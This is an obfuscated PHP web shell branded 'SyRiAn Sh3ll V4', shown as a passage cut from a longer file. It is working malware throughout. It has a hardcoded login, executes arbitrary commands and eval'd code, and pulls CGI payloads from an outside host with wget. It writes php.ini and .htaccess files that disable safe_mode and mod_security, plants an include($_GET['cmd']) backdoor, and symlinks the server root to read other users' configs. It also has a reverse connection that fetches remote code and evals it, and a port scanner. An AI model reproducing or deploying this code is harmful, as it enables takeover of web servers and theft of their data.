d\x6fcu\155e\x6e\x74.l\x6f\143a\x74\151\x6f\156=’”.pYJ33grm9().”‘;}
}

“; if($_GET['id'] == ” && $_GET['info'] == ”) { $css .= “w\x69n\x64\157w.\154\x6f\x63\x61\x74\151\x6f\156 = ‘?\x69\x64=m\x61\x69\156\x50\141g\145′;“; } return $css; } function Logout() { print “<\163\143r\151pt>
\x64\157cume\x6e\164.c\157\x6f\x6bie=’user=’;
\x64\x6f\143um\x65\156t.\143\157\x6f\153\151\x65=’pass=’;
v\141\x72 url = w\151\x6ed\157\x77.\154\x6f\143\x61\164\x69o\x6e.pat\150\x6e\x61\x6d\145;
v\141\162 filename = url.su\x62s\164\162in\147(url.\x6ca\x73\164\111n\x64e\170\x4ff(‘/’)+1);
\167\x69\156do\x77.\154\x6fca\x74\151\157\x6e=filename;
“; } function About() { $about = ”

<\x74\144 \x77\151d\x74\150=1025>
<\x64\x69v \141\x6c\151\147\x6e=\x63\145\156\x74\145\162>

<\x73y>

C\x6f\144\145\144 B\x79 : \x45\x48 << \123yRi\101n | 34\1071\x33
From : \x53\x79\x52\151\101n A\162a\x62ic \x52ep\165\142\154\151c
\x41\x67e : 4/1991<\x62\x72>
<\163\171>
\124h\141\x6e\170 : [ All\x61\150 ] [ \110\141\x6ei\x57\124 ] [ S\x79\122iA\x6e_S\x6e\111p\x45\x72 ] [ \123y\122i\101\156_\x53\x70\x49\144E\162 ] [ \124\x4eT H\x61\143\x6b\x65\x72 ]
<\x73y><\x64iv \x61l\x69\x67n=\143en\x74\145r>\x54h\141\156x : \155\x79 sc\x68\157\x6f\x6c : [ w\x77\x77.google.com ] :)
<\x73\171><\142\162><\x64iv al\151\147\x6e=\x63\x65n\164e\162>\x42\063 \x43\x72\x334\x54!V\063 0\x52 \104!3 \124\122y!\x6eG


<\x62r/>
<\x63e\156te\162>
<\x62\x72/>
<\x66\157\x72\x6d method='\x50OST'>

<\x62\162/>
\x50\154eas\x65 \122\x65\x70\157\162\164 U\163 \x42\x75g\163 \x4f\x72 \163\165\x67\147\145\x73\x74\x69on\x73 .


“; return $about; } if(!($_GET['id'] == ‘sshSession’)) { echo CSS($kHFd4g91d); } function ekV8gb3DG($url) { $oGq24gO8N = curl_init(); curl_setopt($oGq24gO8N, CURLOPT_FOLLOW, 0); curl_setopt($oGq24gO8N, CURLOPT_HEADER, 1); curl_setopt($oGq24gO8N, CURLOPT_URL, $url); curl_setopt($oGq24gO8N, CURLOPT_RETURNTRANSFER, 1); curl_setopt($oGq24gO8N, CURLOPT_TIMEOUT, 30); $data = curl_exec($oGq24gO8N); if($data) { return $data; }
else { return 0; } } function OSt7g0dZY($text) { return htmlspecialchars($text, ENT_QUOTES); }

if ($EYNf1ghFE ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user && $_POST[passwrd]==$pass) { print’‘; } else { if($_POST['usrname']) { print’‘; } echo ‘

SyRiAn Sh3ll V4


‘; exit; } } }

error_reporting(0); session_start(); unset($user); unset($pass); if ($_POST['cmd']) $_POST['cmd'] = gbP9fg0Cj($_POST['cmd']); $aYM22gfc5 = 1000; $LLA67gGgV = 100; $Pke66g2V4 = 20; $user[] = “roo\x74″; $pass[] = md5(“\x73\1713″); $alias = array( “\154\141″ => “l\163 -la”, “\162\146″ => “\x72m -\146″, “un\142z2″ => “t\x61\162 -\170j\x70\146″, “un\x67z” => “\x74\141r -x\x7a\x70f” ); if (!$_SESSION['user']) { $hMkbegzes = “Login:\n”; $sXHbfg0oq = “\x50\141\x73\163\x77\157r\x64:\n”; $ReI4cgGFE = “\x49\x6e\166\141l\x69\144 \x6c\x6fg\x69n!\n\n”; $KMMdcgC2j = “W\141\162\156\x69\156g!
D\157\156`\x74 \142\x65 \163\164\x75\x70\151\144 .. th\x69\x73 \151s a \160\x72\x69v\x33 server, so \164a\153e ex\x74r\x61 ca\162\x65!!!\n\n”; if ($_SESSION['login'] && $_POST['cmd']) {
$_SESSION['output'] .= $sXHbfg0oq; if (in_array($_SESSION['login'], $user)) {
$key = array_search($_SESSION['login'], $user); if ($pass[$key] != md5($_POST['cmd'])) {
$_SESSION['output'] .= $ReI4cgGFE; unset($_SESSION['login']); $pGhc1g_9m = $hMkbegzes; } else {
$_SESSION['user'] = $_SESSION['login']; $_SESSION['whoami'] = substr(Exe(“\167\x68\x6fa\x6di”), 0, -1); $_SESSION['host'] = substr(Exe(“uname -n”), 0, -1); $_SESSION['dir'] = substr(Exe(“\160\x77\144″), 0, -1); $_SESSION['output'] .= $KMMdcgC2j; $pGhc1g_9m = ddhd3gXnj(); unset($_SESSION['login']); } } else {
$_SESSION['output'] .= $ReI4cgGFE; unset($_SESSION['login']); $pGhc1g_9m = $hMkbegzes; } } else {
if (!$_SESSION['login'] && !$_POST['cmd']) $pGhc1g_9m = $hMkbegzes; if (!$_SESSION['login'] && $_POST['cmd']) { $_SESSION['login'] = $_POST['cmd']; $_SESSION['output'] .= substr($hMkbegzes, 0, -1) . ” $_POST[cmd]\n”; $pGhc1g_9m = $sXHbfg0oq; } } } else {
$pGhc1g_9m = ddhd3gXnj(); chdir($_SESSION['dir']); if ($_REQUEST['clear_hist'])
$_SESSION['history'] = “”; if ($_SESSION['history']) $hist_arr = explode(“\n”, $_SESSION['history']); if ($_POST['cmd']) { if (!in_array($_POST['cmd'], $hist_arr)) {
$hist_arr[] = $_POST['cmd']; $_SESSION['history'] = implode(“\n”, $hist_arr); } if (count($hist_arr) > $LLA67gGgV) {
$start = count($hist_arr) – $LLA67gGgV; $_SESSION['history'] = “”; for ($i = $start; $i < count($hist_arr); $i++) $_SESSION['history'] .= $hist_arr[$i] . "\n"; $_SESSION['history'] = substr($_SESSION['history'], 0, -1); $hist_arr = explode("\n", $_SESSION['history']); } $mZm56gZM9 = mZm56gZM9($_POST['cmd']); if (array_key_exists($mZm56gZM9, $alias)) {
$_POST['cmd'] = $alias[$mZm56gZM9] . substr($_POST['cmd'], strlen($mZm56gZM9)); $mZm56gZM9 = mZm56gZM9($_POST['cmd']); } switch ($mZm56gZM9) { case "\x63\x6ce\141r": $_SESSION['output'] = ""; break; case "e\x78\151\164": session_destroy(); refresh(); break; case "c\x64": $_SESSION['output'] .= $pGhc1g_9m; $result = Exe($_POST['cmd'] . " 2>&1 ; \160\x77d”); $result = explode(“\n”, $result); $_SESSION['dir'] = $result[count($result) - 2]; if (count($result) > 2)
$result[0] = “\n” . substr($result[0], strpos($result[0], “\143\x64: “)) . “\n”; else $result[0] = “\n”; $pGhc1g_9m = ddhd3gXnj(); $_SESSION['output'] .= $_POST['cmd'] . $result[0]; break; default: $result = Exe($_POST['cmd'] . ” 2>&1″); if (substr($result, -1) != “\n”) $result .= “\n”; $_SESSION['output'] .= $pGhc1g_9m . $_POST['cmd'] . “\n” . $result; $rows = preg_match_all(‘/\n/’, $_SESSION['output'], $Ckn1dgOMR); unset($Ckn1dgOMR); if ($rows > $aYM22gfc5) { preg_match(‘/(\n[^\n]*){‘ . $aYM22gfc5 . ‘}$/’, $_SESSION['output'], $DpPaegBtV); $_SESSION['output'] = $DpPaegBtV[0] . “\n”; } } } } function gbP9fg0Cj($Aahd7g2SB) { $Aahd7g2SB = str_replace(“\\\\”, “\\”, $Aahd7g2SB); $Aahd7g2SB = str_replace(“\\\”", “\”", $Aahd7g2SB); $Aahd7g2SB = str_replace(“\\’”, “‘”, $Aahd7g2SB); while (strpos($Aahd7g2SB, ” “) !== false) $Aahd7g2SB = str_replace(” “, ” “, $Aahd7g2SB); return rtrim(ltrim($Aahd7g2SB)); } function ddhd3gXnj() { global $_SESSION; return $_SESSION['whoami'] . “@” . $_SESSION['host'] . ” ” . substr($_SESSION['dir'], strrpos($_SESSION['dir'], “/”) + 1) . ” $ “; } function mZm56gZM9($Aahd7g2SB) { list($Aahd7g2SB) = preg_split(‘/[ ;]/’, $Aahd7g2SB); return $Aahd7g2SB; } function refresh() { global $_SERVER; $VCed1gdPi = substr($_SERVER['SCRIPT_NAME'], strrpos($_SERVER['SCRIPT_NAME'], “/”) + 1); header(“\114\157\143at\x69on: $VCed1gdPi”); die; } $DpPaegBtV = substr(preg_replace(‘/<\/(textarea)/i', '</\1', $_SESSION['output']), 0, -1); if($_GET['id'] == "\x73\163\x68\123\x65\x73\163i\157\x6e") { echo '


SyRiAn Sh3ll V4 ~~ SSH Session















‘; if ($hist_arr) { echo ‘ ‘; } echo ‘

‘.substr($pGhc1g_9m, 0, -1) .’



‘; } else {

error_reporting(0); @set_time_limit(0); @ini_set(‘max_execution_time’,0); $dir = getcwd(); $uname= @php_uname(); if(strlen($dir)>1 && $dir[1]==”:”) $afSadgZf6 = “\127\x69nd\157\x77\x73″; else $afSadgZf6 = “\114in\165x”; $crfd2gChk = gethostbyname($_SERVER["\110\x54T\120_\110\x4f\x53\124"]); $server = @substr($SERVER_SOFTWARE,0,120); echo “<\x73c\x72\x69\160t>
\146u\156\x63t\151\157\x6e \157\160en\120\x48\x50\111n\x66\157()
{
m\x79_\167\151\156\x64\157\167= \167\151n\x64\x6f\x77.op\145\156 (\”?\x69n\x66\157=g\145\164P\150p\111\156\x66o\”,\”\120\110P I\156f\x6f\”,\”\167\151\x64\x74\150=800,h\145i\147\x68\164=600,\163\x63\162ollba\x72\x73=1\”);
}
“; if($_GET['info'] == ‘getPhpInfo’) { phpinfo(); } echo ”
<\142\x6f\144y \144\151\x72='l\x74r'>

&n\142\x73\160;&\x6eb\163p;

<\144\151\x76 d\x69\x72=\154t\x72 a\154\x69g\x6e=\x63e\x6et\145\162><\x62>
<\151m\147 b\157\x72\x64\145r=0 s\x72c=\150\x74\x74p://\x77ww.\163\x79\162\x69an-\163h\x65\x6c\154.\x63\157\x6d/e\x61\x67l\x65.\152\x70\x67 w\x69\x64th=101 h\x65ig\150\x74=93>&\156b\163p;<\x64\x69\x76
d\x69\x72=l\x74\162 a\x6ci\x67n=c\145\x6e\x74\x65\x72><\x73\160\x61n s\x74\171\x6c\x65=he\151g\x68\164: 25p\x78;><\142>
<\146o\x6et size=4 \x63\x6fl\157\x72=#FF\x30\060\060\060>\123\171R\151\x41\156 \x53h<\x66\157\x6et size=4 \143\x6f\154o\x72=#999999>3l\x6c\126\x34<\x73\160a\x6e st\171l\145=\x66\x6f\x6e\164-size: 20\x70\x74; colo\162: #990000><\x70> bg\x63o\x6c\x6f\162=#000000>
<\x70 dir=\x6c\x74r>&\x6eb\x73p; [M\x61\x69\x6e]
<\x62>[S\x63\162i\x70t\x73 \110\141\x63k\151\x6e\x67]

[\x53\x53H \123e\x73\163\x69\157\156]
[About]
<\x62>[\x4cog\157\165\x74]
<\142>[S\x75\151\x43\x69\x64e]
<\142r>

&n\x62\163p; \x53\x61\146\145 Mod\x65 = “.@SafeMode().” <\x66\157\156\x74 size=1>
&n\142\x73\160; S\x79\163\164\145\155 = <\x73y>“.$afSadgZf6.”
&\x6e\x62\x73\160; \x4dag\151\x63_\x51\165o\164e\x73 = <\163\171>“. @OZK95glUK().”
&\x6e\142s\x70; Curl = <\x73\x79>“.@Curl().”
&\x6eb\163\160; Re\147\151\x73\164\145r G\154o\x62a\x6c\x73 = <\163\x79>“.@mtU11g8fs().”
&n\142\x73p; Open \102\141se\144\x69r = <\x73y>“.@lEIabgVDO().”
<\142\x72>
&\156\x62\x73\160; Gzip = <\x73y>“.@Gzip().”
&\x6e\x62\163\160; MySQLI = <\x73\x79>“.@MysqlI().”
&\156bs\160; MSQL = “.@MSQL().”
&\x6e\x62\163p; \x53\x51L \114i\164\145 = <\163\x79>“.@zZL12gCfO().”
&\x6e\142sp; U\163\145\146\165\x6c\154 \114\x6fc\141l\163 = “.sAjccgBXf().”
<\x62\x72>
&nbs\x70; F\x72e\x65 Spa\x63\145 = “.@jTtcgMMUE(disk_free_space(‘/’)).”
&\156bs\160; T\157t\141l Sp\x61\x63\145 = <\163\171>“.@jTtcgMMUE(disk_total_space(“/”)).”
&\156\x62\x73p; \120\110P \126\x65rs\x69\157n = <\x73y>“.@phpversion().”
&\156b\x73\x70; \x5a\145n\x64 \126e\x72\163\151\157\x6e = “.@zend_version().”
&n\x62\163\x70; My\123\121L \x56\x65rs\x69\x6fn = <\x73\171>“.@mysql_get_server_info().”

<\142r>
&\156bsp; \115\171\x53\121\x4c = “.VcDegoLHH().”
&nb\x73p; MsSQL = “.MsSQL().”
&\156\x62s\x70; PostgreSQL = “.PostgreSQL().”
&\x6e\x62\163p; Oracle = “.Oracle().”
&\156bs\160; \123\145\x72\166e\x72 \116\x61\x6d\145 = <\x73y>“.$_SERVER['HTTP_HOST'].”
&\x6e\142\x73\160; S\x65\x72\x76\145r Ad\155\x69\x6e = <\x75><\163y>“.$_SERVER['SERVER_ADMIN'].”

<\142\162>
&\156\x62\163p; \x44\x69\x73_\106u\x6e\x63ti\157\156\x73 = <\x73y>“. DisableFunctions().” <\142\x72>
&\x6e\x62\x73\160; \x59\157\x75\x72 \111\120 = “.FNGbgKPZ3().”
&\x6e\x62sp; Se\162\x76\145\x72 I\x50 = <\165><\163y>“.gethostbyname($_SERVER["HT\x54\x50_\110O\123T"]).”
[Reve\x72\163\x65 I\120]
&n\x62sp; D\141\x74e \124\x69\x6de = <\163y>“.date(‘Y-m-d H:i:s’).” <\142r/>
&nbs\x70;
[M\104\065 \103r\141\x63ker]
[S\110\x41\x31 Cr\141c\153e\x72]
[\x4eT\114\115 \x43r\141\x63\153\x65\162]
<\x62r>
<\x62\162>
<\164\x61\142\154\145 b\147c\157\x6c\157\162='#\x63cc\x63\x63c' w\151d\x74h='100%'><\164\x72>
<\x74d \141l\x69g\x6e='ri\147h\164' wi\144\164\x68='100'>

&\x6e\x62\x73\160;&\156b\163\x70;S\145\162\166e\162 : &\156\142\x73p;
uname -a : &\x6e\142\163p;
<\142\x72>\160w\x64 : &nb\163\160;<\142\162>\x49D : &n\142\x73\160;<\x62r>
<\164\x64>

&\x6eb\x73\160;&n\142s\160;”.$server.”
<\142\162>&\x6e\x62s\x70;&n\142sp;<\x62r>&\x6e\142\163\x70;&n\x62\x73\x70;”.$dir.”<\x62\162>&\156\142\163\160;&nbs\x70;”.Exe(‘id’).”



&\156\x62\163\x70;&\x6ebsp;[\104\157wn]
[Pr\x69\x6e\x74]
“;

if ($_GET['id']== ‘mainPage’) { echo “<\146\157r\155 method='PO\123\x54'><\164\x61b\154\145 b\x67\x63\x6f\154or='#\x63cc\143\x63c' \x63\145\x6clp\x61\x64\x64\151\x6e\x67='0' c\145\154\x6c\x73p\x61\x63\x69\156\147='0' wi\144\164h='100%'><\164\162><\164d>
<\x74\x65\170\164\141\162ea name='\105x\145\x63\165t\x69\157\156A\162\x65\141' rows='20' c\x6f\154\x73='152'>“; if(!$_POST || $_POST['login'])
{ @chdir($_POST['directory']); KidcdgPR8($afSadgZf6); } else if($_POST['submitCommands'])
{ echo Exe($_POST['alias']); } else if($_POST['Execute'])
{ @chdir($_POST['directory']); if(empty($_POST['cmd'])) { KidcdgPR8($afSadgZf6); } else { echo Exe($_POST['cmd']); } } else if($_POST['submitEval'])
{ $eval = @str_replace(““,”",$eval); $eval = @str_replace(“\\”,”",$eval); echo eval($eval); }

else if($_POST['analyzieNow']) { $hash = $_POST['hashToAnalyze']; $rOPdbgzlP = substr($hash,0,3); if($rOPdbgzlP ==’$ap’ && strlen($hash) == 37) { echo “T\150e \x48\x61s\x68 : “.$hash.” i\163 : MD\065(AP\x52) \110\141\163h”; } else if($rOPdbgzlP ==’$1$’ && strlen($hash) == 34) { echo “\x54\x68\145 H\141s\150 : “.$hash.” \x69\163 : \x4dD\065(UNIX) \x48\x61s\150″; } else if($rOPdbgzlP ==’$H$’ && strlen($hash) == 35) { echo “T\150e H\141s\150 : “.$hash.” \x69s : \115D\065(\160\150\160\x42\x423) H\x61\x73h”; } else if(strlen($hash) == 29) { echo “\124h\145 Ha\x73\150 : “.$hash.” \x69\163 : M\x44\065(\x57\157\162\144\160\162\x65\x73\x73) \110\141\x73h”; } else if($rOPdbgzlP ==’$5$’ && strlen($hash) == 64) { echo “T\x68e \x48\x61\x73\150 : “.$hash.” \151\x73 : \123H\x41\x32\065\066(U\x4e\111\x58) \110\141s\150″; } else if($rOPdbgzlP ==’$6$’ && strlen($hash) == 128) { echo “\124\x68\145 H\141s\x68 : “.$hash.” \151\163 : \x53\x48A5\061\x32(\125\116\x49\x58) \110\141\163h”; } else if(strlen($hash) == 56) { echo “\124\150e \110\x61s\x68 : “.$hash.” \x69\x73 : \123\110\x41\x3224 H\x61s\x68″; } else if(strlen($hash) == 64) { echo “\124\150\145 \x48\141\163\150 : “.$hash.” \x69\x73 : S\110\x41\x32\x35\x36 \110\x61\163\150″; } else if(strlen($hash) == 96) { echo “\x54\150\x65 \x48\141s\x68 : “.$hash.” \x69\x73 : S\110\101\063\0704 \110\x61\163\150″; } else if(strlen($hash) == 128) { echo “\124\x68\x65 H\141\163\150 : “.$hash.” \151s : \123H\101\x35\0612 H\141sh”; } else if(strlen($hash) == 40) { echo “\x54h\145 \x48a\x73h : “.$hash.” \x69s : \x4dy\123Q\x4c v\065.x \x48\x61\163h”; } else if(strlen($hash) == 16) { echo “\x54he \x48\x61\163\x68 : “.$hash.” \x69\163 : \115y\x53\x51L \110\141\163\150″; } else if(strlen($hash) == 13) { echo “\x54\150\x65 H\141\163\150 : “.$hash.” \x69\x73 : \104E\x53(\x55\x6e\151x) Ha\163\x68″; } else if(strlen($hash) == 32) { echo “\x54\x68e \110\141\163\x68 : “.$hash.” \151\163 : \x4d\104\065 H\141s\x68″; } else if(strlen($hash) == 4) { echo “\x54\150\145 Ha\x73\150 : “.$hash.” \x69\163 : [CR\x43-16]-[\x43\x52C-16-\x43\x43IT\x54]-[F\103\123-16]“;} else { echo “\x45r\162\157\x72 : \x43\x61\156′\x74 \104et\x65\x63t \110a\x73h \x54\x79pe”; } }

else if($_POST['showUsers']) { showUsers(); }

else if($_POST['generatePel']) { @chdir($_POST['cgiperlPath']); @mkdir(‘cgi’, 0755); @chdir(‘cgi’); if(function_exists(‘fwrite’) && function_exists(‘file_get_contents’)) { $file = fopen(‘cgiPerl.sy3.zip’,'w+’); $lqLe2g6_F = file_get_contents(‘http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip’); $JjYfdgdgG = fwrite($file,$lqLe2g6_F); } else { Exe(‘wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip’); } if(class_exists(‘ZipArchive’)) { $zip = new ZipArchive; $bDpcagAUg = $zip->open(‘cgiPerl.sy3.zip’); if ($bDpcagAUg === TRUE) { $zip->gAC4fgS8T($_POST["\x63g\151\x70\x65\x72\154\x50\141\164h"]); $zip->KMf27gmaG(); } } else { Exe(‘unzip cgiPerl.sy3.zip’); } @unlink(‘cgiPerl.sy3.zip’); @chmod(“\143gi\120e\162\154.\163y\x33″,0755); @chmod(“\x63\157\155\x70\151\x6cer”,0777); $bpT23gGZ4 = fopen(‘.htaccess’,'w+’); @fwrite($bpT23gGZ4,’AddHandler cgi-script .sy3′); echo ‘
Go To Link : cgi/cgiPerl.sy3
Password Is : sy3′ ; }

else if($_POST['generateSER']) { @chdir($_POST['ShourtCutPath']); @mkdir(“\141\154l\x73\x65r\x76\145\162″, 0755); @chdir(“\141\x6c\154se\162\166\145\162″); Exe(“\x6c\x6e -s / a\x6c\x6c\x73\x65r\166\145\x72″); fYUag2UGE(“.htaccess”,”
Opt\151\157ns \x49n\144\x65x\x65\x73 \106\157\154l\x6f\167\123\171\155\114\151\x6e\153\163
\104\151\x72\145\143\164\157\162y\x49\x6ed\145x \x73s\x73\x73s\x73.ht\x6d
\x41\144d\124\171\x70e t\170\x74 .\160\150\x70
\x41\144dH\141\x6edler txt .\x70hp”); echo ‘Now Go to allserver folder ‘.$_POST['ShourtCutPath'].” ; }

else if($_POST['changePermission']) { $AKM25gA6G = @chmod($_POST['fileName'],$_POST['per']); if($AKM25gA6G) echo “\x50\x65\x72\155\151ssi\157\156 C\x68a\156g\145\x64 \123\x75c\143e\163\x73\x66u\154l\x79 ! ” ; else echo “C\x68\141ngi\156\147 \x49s N\157\x74 A\x6c\x6c\157wed \117r \124\x68\145 \106il\145 \x69\163 n\157\x74 \x45\x78\x69s\x74 !”; }

else if($_POST['GenerateUsers']) { @chdir($_POST['usersPath']); @mkdir(“\x75\x73\145\162s”, 0755); @chdir(‘users’); $fileUrl = ‘http://www.syrian-shell.com/usersAndDomains/users.rar’; mso60gm0z($fileUrl); Exe(‘mv users.rar users.sy3′); @chmod(‘users.sy3′,0755 ); $KPbf2geAR = fopen(‘.htaccess’,'w+’); fwrite($KPbf2geAR,’AddHandler cgi-script .sy3′); echo ” \120\x6c\145\141\163\x65 \126\151\163\151\164 \124\150\151\x73 \114\151nk u\x73\x65r\163/\165s\145\162s.\x73y3″ ; }

else if($_POST['generateForbidden']) { @chdir($_POST['forbiddenPath']); @mkdir(‘forbidden’); @chdir(‘forbidden’); $htaccess = fopen(‘.htaccess’,'w+’); if($_POST['403'] == ‘DirectoryIndex’) { fwrite($htaccess,”\x44\x69\162e\143\x74ory\111\156\x64\x65x i\x6e.\164\170t”); } elseif($_POST['403'] == ‘HeaderName’) { fwrite($htaccess,”He\141derNa\x6d\145 i\156.\164\170t”); } elseif($_POST['403'] == ‘TXT’) { fwrite($htaccess,”
O\x70\x74i\x6f\x6e\163 \x49\x6e\144\x65x\x65s \x46\x6f\154lo\x77S\171\155\114\151\x6e\x6b\x73
\x61\x64dTy\x70\x65 \164\x78\x74 .\x70\150\160
\101d\144\110\x61\x6e\x64le\x72 \164\170\164 .p\150\x70″); } elseif($_POST['403'] == ’404′) { fwrite($htaccess,”
E\x72\x72o\162D\x6fc\x75\x6d\x65n\x74 404 /404.\x68\164\155\x6c
404.ht\x6dl = \x53\171\155l\151n\153\145d \151\156.\x74x\x74 “); } elseif($_POST['403'] == ‘ReadmeName’) { fwrite($htaccess,”Re\x61\x64m\x65\116\141m\x65 \x69\x6e.\x74\x78\164″); } elseif($_POST['403'] == ‘footerName’) { fwrite($htaccess,”foot\x65\x72\x4e\x61\x6d\145 i\x6e.\164\x78\x74″); } echo ”
\x4eow \107\x6f \124\x6f [ f\x6f\x72\x62i\144d\145n ] \104i\x72 \x41\x6ed \x54\x68\x65n m\141\153e Th\x65 S\x68\x6f\162\164c\165t [ \151\156.txt ]
\x45\x58 : \154\156 -s /ho\x6d\145/user/\x70\x75\x62l\x69\x63_\150t\x6d\x6c/config.\160\150\160 \x69n.\164\170\x74″; }

else if($_POST['UploadNow']) { $uploadingDir = $_POST['uploadingDir']; $uploadingDir = str_replace(“\\\\”,”\\”,$uploadingDir); $uploadingDir = str_replace(“//”,”/”,$uploadingDir); chdir($uploadingDir); $OiRa2gAaX =0; $jDG54gLhA = array(); $path= ”; $OGodfgZUz= $path . basename($_FILES['uploadfile']['name'][$i]); for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) { if($_FILES['uploadfile']['name'][$i] != '') { move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $OGodfgZUz . $_FILES['uploadfile']['name'][$i]); $jDG54gLhA[] = $_FILES['uploadfile']['name'][$i]; $OiRa2gAaX++; echo "The F\151l\145 ".basename($_FILES['uploadfile']['name'][$i])." \x55\160\154\157\141\x64\x65\144 \x53\165\x63ces\x73\x66\x75\x6c\154\171 !
"; } else "\124h\145 \x46\x69\154e ".basename($_FILES['uploadfile']['name'][$i])." \103\x61n'\x74 \102\x65 \x55\160\154\x6f\x61\144 :( !"; } }

else if($_POST['phpiniGenerate']) { fYUag2UGE("\x70\150\160.\151ni","
safe_mode = Of\x66
d\151s\x61\x62l\x65_\146\165\x6ect\151\157\x6es = \x4e\117N\105
s\141f\145_\155\x6f\x64\145_\147i\x64 = \117FF
\x6f\x70e\156_\142a\163\145\x64ir = O\106\106"); echo "\160\150p.i\156i \110\141\x73 Be\x65\x6e G\x65\156er\141\164\x65\144 \123\165\x63ce\x73\x73\x66u\x6cl\x79"; } else if($_POST['htaccessGenerate']) { fYUag2UGE(".htaccess","
<\x49\x66M\x6f\144ul\x65 m\x6f\x64_\163\145c\165r\x69t\171.\x63>
\123e\143\x46i\154terE\x6eg\151\x6e\x65 \x4f\146\x66
\123\145c\106\x69lt\145\162S\x63\141\x6e\120\x4fS\124 \117\146\x66
S\x65\x63Fi\x6c\x74\x65rC\x68\x65c\153\x55\x52LEn\x63\157\x64\151\x6eg Of\x66
\123\x65c\x46ilte\x72\103\150eck\103\x6fok\x69e\x46\157\x72\x6d\141\164 \117f\x66
\x53\x65\143\106\x69l\164e\x72\x43h\145ck\125\x6e\151\143\x6f\x64\x65\x45ncodin\x67 \x4fff
\123\145\x63\x46i\154t\x65\x72\116o\x72\155a\x6c\x69\x7ae\x43\157\x6fk\x69\145s \117f\146
</\111\146\115\x6f\x64u\x6ce>
\x53\x65tEn\166 \x50HPR\x43 “.getcwd().”/\x70h\x70.i\156\x69
su\x50H\x50_\103\157\156\146\x69\147\120a\164\x68 “.getcwd().”/ph\160.\151\156\151
“); echo “.htaccess \x48\141\163 \x42\x65e\x6e \x47e\156\145\x72at\145\144 \123\165\x63\143\x65\163\x73fu\154\x6c\171 “; } else if($_POST['iniphpGenerate']) { fYUag2UGE(“\151n\151.php”,’
echo ini_get(“safe_mode”);
echo ini_get(“open_basedir”);
ini_restore(“safe_mode”);
ini_restore(“open_basedir”);
echo ini_get(“safe_mode”);
echo ini_get(“open_basedir”);
include($_GET[\'cmd\']);
‘); echo “\x69\156\151.p\x68\x70 Ha\163 B\145\145\156 \107\x65\156\145\x72a\164ed \123u\143\x63e\163\163\x66\x75\154ly”; }

else if($_POST['read'] || $_POST['show']) { $file = $_POST['file']; $file = str_replace(‘\\\\’,'\\’,$file); $file = str_replace(‘//’,'/’,$file); if($_POST['read']) { OdO10gEiB($file); } elseif($_POST['show']) { Piq15gG3A($file); } }

elseif($_POST['encryptNow']) { if(!empty($_POST['ENCRYPTION'])) { $md5 = $_POST['ENCRYPTION']; echo ”
\x4dD\x35 : “.md5($md5).”
\102a\163e64 E\156\x63od\x65 : “.base64_encode($md5).”
\x42a\x73\x65\x36\x34 \x44\x65c\157\x64\145 : “.base64_decode($md5).”
\x43r\x79\160\164 : “.crypt($md5).”
S\110\x411 : “.sha1($md5).”
M\104\064 : “.hash(“\x6dd4″,$md5).”
\x53\x48\101\x325\066 : “.hash(“\163\x68\1412\x356″,$md5).”
U\x52\x4c Enc\x6fd\x69\156g : “.urlencode($md5).”
\125\122L \104\x65\x63\x6f\144i\156\147 : “.oPHd8gEm1($md5).”
\103\122\103\x332 : “.crc32($md5).”
\114\145\x6egt\x68 : “.strlen($md5).”"; } else { echo “Pl\145a\x73\x65 \x50u\x74 \101t \114e\141s\x74 \x4f\x6e\145 \x43\150\141\x72 !”; } }

else if($_POST['metaConnect']) { $ip = $_POST['ip']; $port = $_POST['port']; if ($ip == “” && $port == “”) { echo “\120\x6c\145\141\163\x65 f\151\x6c\x6c \111P \x41dr\145s\163 & \124h\145 \154\151\x73\164\145\156 Port”; } else { $FdR8agDY8 = $ip; $port = $port; if (FALSE !== strpos($FdR8agDY8, “:”)) { $FdR8agDY8 = “[". $FdR8agDY8 ."]“; } if (is_callable(‘stream_socket_client’)) { $XDl9bglcF = @stream_socket_client(“\x74\143p://{$FdR8agDY8}:{$port}”); if (!$XDl9bglcF) { die(); } $gKM9cga03 = ‘stream’; } elseif (is_callable(‘fsockopen’)) { $XDl9bglcF = fsockopen($FdR8agDY8,$port); if (!$XDl9bglcF) { die(); } $gKM9cga03 = ‘stream’; } elseif (is_callable(‘socket_create’)) { $XDl9bglcF = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $bDpcagAUg = socket_connect($XDl9bglcF, $FdR8agDY8, $port); if (!$bDpcagAUg) { die(); } $gKM9cga03 = ‘socket’; } else { die(); } switch ($gKM9cga03) { case ‘stream’: $len = fread($XDl9bglcF, 4); break; case ‘socket’: $len = socket_read($XDl9bglcF, 4); break; } if (!$len) { die(); } $a = unpack(“\116le\x6e”, $len); $len = $a['len']; $orV21gLEa = ”; while (strlen($orV21gLEa) < $len) { switch ($gKM9cga03) { case 'stream': $orV21gLEa .= fread($XDl9bglcF, $len-strlen($orV21gLEa)); break; case 'socket': $orV21gLEa .= socket_read($XDl9bglcF, $len-strlen($orV21gLEa)); break; } } eval($orV21gLEa); echo "[*] Connect\x69\x6f\156 \x54\x65\x72\155i\x6e\x61t\x65\144"; die(); } }

else if($_POST['submitDomainToScanPort']) { $URD41gkDq = $_POST['domainToScanPort']; if(!$URD41gkDq) { echo "[-] \105n\164\145\x72 IP \101\x64\x64\162\145\163\163 \117\162 \104omai\156 \x54\157 Scan"; } else { for($i=0;$i<1024;$i++) { $ACJ59g6aG = @fsockopen($URD41gkDq,$i,$jDR4dghd9,$zfD4egYh7,10); if($ACJ59g6aG) { echo "[+] port " . $i . " o\x70\x65\156 o\156 " . $URD41gkDq . "
"; } flush(); } @fclose($ACJ59g6aG); } }

